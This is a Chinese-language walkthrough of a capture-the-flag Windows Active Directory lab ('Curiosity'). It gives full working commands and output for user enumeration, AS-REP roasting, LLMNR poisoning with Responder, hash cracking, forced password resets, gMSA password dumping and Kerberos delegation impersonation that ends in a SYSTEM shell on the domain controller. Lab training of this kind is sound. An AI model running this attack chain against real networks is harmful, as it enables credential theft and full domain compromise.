TheHackersLabs Curiosity1 Walkthrough

靶场:The Hackers Labs
地址:https://thehackerslabs.com/curiosity/
系统:windows
内容:kerboes信息检索、bloodhound基本使用、impacket使用、TGT伪造提权

扫描一下端口。

└─$ nmap -sV -sC -Pn -p-  -oN port.log $IP
PORT      STATE SERVICE       VERSION                                                                                                                                     
53/tcp    open  domain        Simple DNS Plus                                                                                                                             
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2024-11-10 10:23:23Z)                                                                              
135/tcp   open  msrpc         Microsoft Windows RPC                                                                                                                       
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn                                                                                                               
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)                                                 
|_ssl-date: 2024-11-10T10:24:26+00:00; +1s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=DC.hackme.thl                                                                                                                             
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl                                                                             
| Not valid before: 2024-10-16T13:11:58                                                                                                                                   
|_Not valid after:  2025-10-16T13:11:58                                                                                                                                   
445/tcp   open  microsoft-ds?                                                                                                                                             
464/tcp   open  kpasswd5?                                                                                                                                                 
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0                                                                                                         
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)                                                 
| ssl-cert: Subject: commonName=DC.hackme.thl                                                                                                                             
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl                                                                             
| Not valid before: 2024-10-16T13:11:58                                                                                                                                   
|_Not valid after:  2025-10-16T13:11:58                                                                                                                                   
|_ssl-date: 2024-11-10T10:24:26+00:00; +1s from scanner time.                                                                                                             
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)                                                 
|_ssl-date: 2024-11-10T10:24:26+00:00; +1s from scanner time.                                                                                                             
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after:  2025-10-16T13:11:58
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: hackme.thl, Site: Default-First-Site-Name)
|_ssl-date: 2024-11-10T10:24:26+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=DC.hackme.thl
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC.hackme.thl
| Not valid before: 2024-10-16T13:11:58
|_Not valid after:  2025-10-16T13:11:58
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49686/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
49687/tcp open  msrpc         Microsoft Windows RPC
49690/tcp open  msrpc         Microsoft Windows RPC
49694/tcp open  msrpc         Microsoft Windows RPC
49702/tcp open  msrpc         Microsoft Windows RPC
49718/tcp open  msrpc         Microsoft Windows RPC
49727/tcp open  msrpc         Microsoft Windows RPC
MAC Address: 08:00:27:B4:CB:72 (Oracle VirtualBox virtual NIC)
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_nbstat: NetBIOS name: DC, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:b4:cb:72 (Oracle VirtualBox virtual NIC)
| smb2-time: 
|   date: 2024-11-10T10:24:18
|_  start_date: 2024-11-10T16:21:28

由于没有任何smb、ftp和http入口,可以先尝试获取用户名。两种方法,第一种是使用kerbrute。

└─$ kerbrute_linux_amd64 userenum -d HACKME.THL --dc $IP /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt 
2024/11/10 18:45:11 >  Using KDC(s):
2024/11/10 18:45:11 >   192.168.56.8:88

2024/11/10 18:45:12 >  [+] VALID USERNAME:       administrator@HACKME.THL
2024/11/10 18:45:13 >  [+] VALID USERNAME:       osama@HACKME.THL
2024/11/10 18:45:13 >  [+] VALID USERNAME:       jdoe@HACKME.THL
2024/11/10 18:45:16 >  [+] VALID USERNAME:       Administrator@HACKME.THL
2024/11/10 18:45:23 >  [+] VALID USERNAME:       yogesh@HACKME.THL
2024/11/10 18:46:18 >  [+] VALID USERNAME:       JDoe@HACKME.THL
2024/11/10 18:48:23 >  [+] VALID USERNAME:       appolonia@HACKME.THL
2024/11/10 18:48:28 >  [+] VALID USERNAME:       aaren@HACKME.THL
2024/11/10 19:06:47 >  [+] VALID USERNAME:       mvazquez@HACKME.THL
2024/11/10 19:35:26 >  [+] VALID USERNAME:       ahamil@HACKME.THL
2024/11/10 19:37:58 >  [+] VALID USERNAME:       Osama@HACKME.THL
2024/11/10 19:41:46 >  [+] VALID USERNAME:       Ahamil@HACKME.THL
2024/11/10 19:43:22 >  Done! Tested 8295455 usernames (12 valid) in 3491.133 seconds

第二种是使用impacket-GetNPUsers,还顺便爆出了两个用户的hash,但都无法爆出密码。

└─$ impacket-GetNPUsers hackme.thl/ -no-pass -usersfile /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt | grep -v "Client not found"                      
/usr/share/doc/python3-impacket/examples/GetNPUsers.py:165: DeprecationWarning: datetime.datetime.utcnow() is deprecated and scheduled for removal in a future version. Us
e timezone-aware objects to represent datetimes in UTC: datetime.datetime.now(datetime.UTC).                                                                              
  now = datetime.datetime.utcnow() + datetime.timedelta(days=1)                                                                                                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies                                                                                                     

[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)                                                                                  
[-] User administrator doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                           
[-] User osama doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                   
[-] User jdoe doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                    
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)                                                                                  
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                           
$krb5asrep$23$yogesh@HACKME.THL:d3cc73ac52f4cee4d1b13f6bd699fd7d$fef7e3937981610dc6b78f83c9cb0747d8b2cda420eff8b29436ab09e8cce803be7776782a301dfa8c0c090cf7dd8fe614d90fca7
57954a6949bfbe037c5e5f73d3ae3b2df59a4d31cf6a7d62958e562ed3493effed272265ac1edab36c0092f07534da43f6d4df4571995894fda0adcffa6aff55d91b9c88998822e9277382f249d704204ffbe2d48c
55d73e43285d3e910cdf601d9593788051c2b18efe832d053394ee33fc3e94c6eb695c94e75b8addd6efb56d1d227793f96f3c4695c83b0fa31d84e65710ce2ddbd6dfcb1b737ed1dcd0f4f38a42b9cf379fe5f990
127940a2dc6ad0005                                                                                                                                                         
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)                                                                                  
[-] User JDoe doesn't have UF_DONT_REQUIRE_PREAUTH set                                                                                                                    
$krb5asrep$23$appolonia@HACKME.THL:913af7d9924f0307b43c8ef6304b7c9e$f659cb6c05eb2505f2b2edf8d4f937a0ef06924baed5699c011465d3a6bf004ce2d0cd708b6658f016e8cf845349c3a9a5ea5111c607f1936a950ff6f77173d044f487b7de6e56282649fdbf3a599b36feda18a75dcc11f388ec2c7b1b788536268c7c80d97971df164e358293dddab66cad0571fdd9ceb2442684831755d4ceb32bbbeb7c9e0116
8576d04e87b74ebaf1d581a8ffd26727dc59bb03a75316d2058619da8aa7770e1ddd0a28de9cc15d940a587b3e361effacbbf6070b0a949db742df0fdd6d182137dfd85af402a824f1853b2b25001465558dea11d2
02964e2d113f71d317107f
[-] User aaren doesn't have UF_DONT_REQUIRE_PREAUTH set

将刚才检索出的用户名保存进names.txt。
这种没有明显入口的靶机,一般还可以监听一下,看靶机有没有主动发送什么信息。使用wireshark,可以看出靶机在发送LLMR请求。

本机建立服务器响应请求,可以得到jdoe用户的hash。

└─$ sudo responder -I eth1 -Pdv
...
[*] [NBT-NS] Poisoned answer sent to 192.168.56.8 for name SQLSERVER (service: File Server)
[*] [LLMNR]  Poisoned answer sent to 192.168.56.8 for name SQLserver
[*] [LLMNR]  Poisoned answer sent to fe80::4987:f1f5:20a1:ac2e for name SQLserver
[*] [LLMNR]  Poisoned answer sent to fe80::4987:f1f5:20a1:ac2e for name SQLserver
[*] [LLMNR]  Poisoned answer sent to 192.168.56.8 for name SQLserver
[SMB] NTLMv2-SSP Client   : fe80::4987:f1f5:20a1:ac2e
[SMB] NTLMv2-SSP Username : hackme\jdoe
[SMB] NTLMv2-SSP Hash     : jdoe::hackme:c4a0b88b90f383a6:4AABBCC7076BEB51C1935E984237093F:010100000000000080867E7AAE33DB01DF7E80C99C2B72E2000000000200080050005A004600420001001E00570049004E002D00340041004D003500340055004F005800390041004F0004003400570049004E002D00340041004D003500340055004F005800390041004F002E0050005A00460042002E004C004F00430041004C000300140050005A00460042002E004C004F00430041004C000500140050005A00460042002E004C004F00430041004C000700080080867E7AAE33DB0106000400020000000800300030000000000000000000000000400000AA9C343709B78AB0A28690F054B77F7D29C5675AC5F0C1E1F5C59387ED1973460A0010000000000000000000000000000000000009001C0063006900660073002F00530051004C00730065007200760065007200000000000000000000000000

下面就要爆出jdoe的密码。不过扯淡的来了,这个hash的密码不在rockyou中。看了官方WP提示,发现在reason.txt中。

└─$ john --wordlist=/usr/share/seclists/Passwords/seasons.txt jdoe.hash     
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
$pr1ng@          (jdoe)     
1g 0:00:00:00 DONE (2024-11-10 20:41) 25.00g/s 25600p/s 25600c/s 25600C/s $pr1ng..5umm3r123%
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

检测一下,jdoe可以登录。

└─$ crackmapexec winrm $IP -u jdoe -p '$pr1ng@'
SMB         192.168.56.8    5985   DC               [*] Windows 10 / Server 2016 Build 14393 (name:DC) (domain:hackme.thl)
HTTP        192.168.56.8    5985   DC               [*] http://192.168.56.8:5985/wsman
WINRM       192.168.56.8    5985   DC               [+] hackme.thl\jdoe:$pr1ng@ (Pwn3d!)

使用rpcclient检索一下,看有没有敏感信息,找到疑似osama用户的密码。

└─$ rpcclient -U 'jdoe%$pr1ng@' $IP -c 'querydispinfo'                                                                                                                    
index: 0x10d5 RID: 0x459 acb: 0x00000210 Account: aaren Name: (null)    Desc: (null)                                                                                      
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain                              
index: 0x10db RID: 0x45f acb: 0x00000210 Account: ahamil        Name: (null)    Desc: (null)                                                                              
index: 0x10d8 RID: 0x45c acb: 0x00010210 Account: appolonia     Name: (null)    Desc: (null)                                                                              
index: 0x10d7 RID: 0x45b acb: 0x00000210 Account: bwats Name: (null)    Desc: (null)                                                                                      
index: 0x10d3 RID: 0x458 acb: 0x00000210 Account: dba_adm       Name: dba_adm   Desc: (null)                                                                              
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system.                                               
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain                                    
index: 0x10d6 RID: 0x45a acb: 0x00000210 Account: jdoe  Name: (null)    Desc: (null)                                                                                      
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account
index: 0x10da RID: 0x45e acb: 0x00000210 Account: mvazquez      Name: (null)    Desc: (null)
index: 0x10dc RID: 0x460 acb: 0x00000210 Account: osama Name: (null)    Desc: n()tDH[ow8p7
index: 0x10d9 RID: 0x45d acb: 0x00000010 Account: rsifrey       Name: (null)    Desc: (null)
index: 0x1092 RID: 0x452 acb: 0x00000210 Account: sqlsvc        Name: sqlsvc    Desc: (null)
index: 0x10dd RID: 0x461 acb: 0x00010210 Account: yogesh        Name: (null)    Desc: (null

检测一下,是正确密码。

└─$ netexec smb $IP -u osama -p 'n()tDH[ow8p7'                                                                                                                            
SMB         192.168.56.8    445    DC               [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC) (domain:hackme.thl) (signing:True) (SMBv1:False)               
SMB         192.168.56.8    445    DC               [+] hackme.thl\osama:n()tDH[ow8p7

使用jdoe用户登录靶机,上传SharpHound.exe,运行并收集信息,生成.zip文件。

─$ evil-winrm -i hackme.thl -u jdoe -p '$pr1ng@'
*Evil-WinRM* PS C:\Users\jdoe\Documents>
*Evil-WinRM* PS C:\Users\jdoe\Documents> dir

    Directory: C:\Users\jdoe\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       11/10/2024   2:03 PM          13455 20241110140325_BloodHound.zip
-a----       11/10/2024   2:03 PM          12184 MGVmMzZlNzEtOGNkZi00MTFiLThlMmUtNTBhODliZjlhNDgz.bin
-a----        11/1/2024   7:07 AM        1052160 SharpHound.exe

下载.zip文件到本机,导入bloodhound,查看jdoe的情况,发现jdoe属于IT Admins组,而该组可以操控DBA_ADM用户。

下面就是修改dba_adm的密码。也是多种方法,可以使用bloodhound帮助中给出的方法。

─$ net rpc password dba_adm 'Pass1234!' -U hackme.thl/jdoe%'$pr1ng@' -S hackme.thl
└─$ netexec winrm $IP -u dba_adm -p 'Pass1234!'
WINRM       192.168.56.8    5985   DC               [*] Windows 10 / Server 2016 Build 14393 (name:DC) (domain:hackme.thl)
WINRM       192.168.56.8    5985   DC               [+] hackme.thl\dba_adm:Pass1234! (Pwn3d!)

也可以利用PowerView脚本的Set-ADAccountPassword。

*Evil-WinRM* PS C:\Users\jdoe\Desktop> Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
*Evil-WinRM* PS C:\Users\jdoe\Desktop> \\192.168.56.101\kali\PowerView.ps1
*Evil-WinRM* PS C:\Users\jdoe\Desktop> import-Module ActiveDirectory
*Evil-WinRM* PS C:\Users\jdoe\Desktop> Set-ADAccountPassword -Identity 'dba_adm' -NewPassword (ConvertTo-SecureString 'Pass1234!' -AsPlainText -Force)

获取dba_adm用户后,该用户是数据库管理员,可以查看sql信息。先查询一下靶机运行的数据库实例。

*Evil-WinRM* PS C:\Users\dba_adm\Documents> reg query "HKLM\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Microsoft SQL Server\Instance Names\SQL
    SQLEXPRESS    REG_SZ    MSSQL15.SQLEXPRESS

这里又遇到一个奇葩的问题,sqlcmd -S无法登录sql的交互终端,但是-Q参数可以执行查询。

*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "SELECT name FROM sys.databases"
name
--------------------------------------------------------------------------------------------------------------------------------
master
tempdb
model
msdb
CredentialsDB

最后,在CredentialsDB库的Credentials表下,查询到了sqlsvc的密码hash。

*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE CredentialsDB; SELECT name FROM sys.tables;"                                        
Changed database context to 'CredentialsDB'.                                                                                                                              
name                                                                                                                                                                      
--------------------------------------------------------------------------------------------------------------------------------                                          
Credentials

*Evil-WinRM* PS C:\Users\dba_adm\Documents> sqlcmd -S localhost\SQLEXPRESS -E -Q "USE CredentialsDB; SELECT * FROM Credentials;"
Changed database context to 'CredentialsDB'.
ID          Username                                           Password
----------- -------------------------------------------------- ----------------------------------------------------------------------------------------------------
          1 sqlsvc                                             23012244084524e51305f015727b890b

(1 rows affected)

可以破解出该hash的密码明文,检测一下密码是正确的。

└─$ netexec winrm $IP -u sqlsvc -p 'P@ssword1234!' 
WINRM       192.168.56.8    5985   DC               [*] Windows 10 / Server 2016 Build 14393 (name:DC) (domain:hackme.thl)
WINRM       192.168.56.8    5985   DC               [+] hackme.thl\sqlsvc:P@ssword1234! (Pwn3d!)

以sqlsvc身份登录,文件目录下有Rubeus.exe和一个ticket,这是伪造票证攻击的工具。

└─$ evil-winrm -i $IP -u sqlsvc -p 'P@ssword1234!'
*Evil-WinRM* PS C:\Users\sqlsvc\Documents> dir
    Directory: C:\Users\sqlsvc\Documents

Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----       10/17/2024   8:03 PM         458752 Rubeus.exe
-a----       10/18/2024   8:18 AM           2062 ticket.kirbi

在bloodhound下查看sqlsvc节点,sqlsvc是GMSA_USERS组的成员,具备读取GMSA密码的权限。

查看下bloodhound的帮助。

下载相关工具,执行密码读取操作。

└─$ gMSADumper.py -u sqlsvc -p 'P@ssword1234!'  -l $IP -d hackme.thl
Users or groups who can read password for GMSA_SVC$:
 > GMSA_USERS
GMSA_SVC$:::bff6491f79b1d83630b752e845725f68
GMSA_SVC$:aes256-cts-hmac-sha1-96:f97efd04e1cd5f32152693d433cd1cb7a1a5f277dd9abc085c4fd6aafcba2cca
GMSA_SVC$:aes128-cts-hmac-sha1-96:9407caf59a3cf1609500b203d562523e

该命令也可以用netexec执行,同样可以得到gmsa_svc用户的NTLM hash。

└─$ netexec ldap $IP  -u  sqlsvc -p 'P@ssword1234!' --gmsa
SMB         192.168.56.8    445    DC               [*] Windows 10 / Server 2016 Build 14393 x64 (name:DC) (domain:hackme.thl) (signing:True) (SMBv1:False)
LDAPS       192.168.56.8    636    DC               [+] hackme.thl\sqlsvc:P@ssword1234! 
LDAPS       192.168.56.8    636    DC               [*] Getting GMSA Passwords
LDAPS       192.168.56.8    636    DC               Account: GMSA_SVC$            NTLM: bff6491f79b1d83630b752e845725f68

在bloodhound中查看GMSA_SVC节点,对域控服务器具有AllowedToAct权限。查看bloodhound的帮助,一种方法是在靶机运行Rebues,但gsma_svc不属于"Remote Management Users"组,无法登录终端。

另一种方法是利用impacket-getST脚本。

└─$ impacket-getST -spn www/dc.hackme.thl 'hackme.thl/GMSA_SVC' -hashes :bff6491f79b1d83630b752e845725f68 -impersonate Administrator -dc-ip $IP
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating Administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@www_dc.hackme.thl@HACKME.THL.ccache

票证已经保存的.ccache文件里,接下来可以以Administrator身份进行登录了。


└─$ export KRB5CCNAME=Administrator@www_dc.hackme.thl@HACKME.THL.ccache

└─$ impacket-psexec administrator@dc.hackme.thl -k -no-pass                           
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Requesting shares on dc.hackme.thl.....
[*] Found writable share ADMIN$
[*] Uploading file jfaPCpZn.exe
[*] Opening SVCManager on dc.hackme.thl.....
[*] Creating service EDuZ on dc.hackme.thl.....
[*] Starting service EDuZ.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

发表回复

您的邮箱地址不会被公开。 必填项已用 * 标注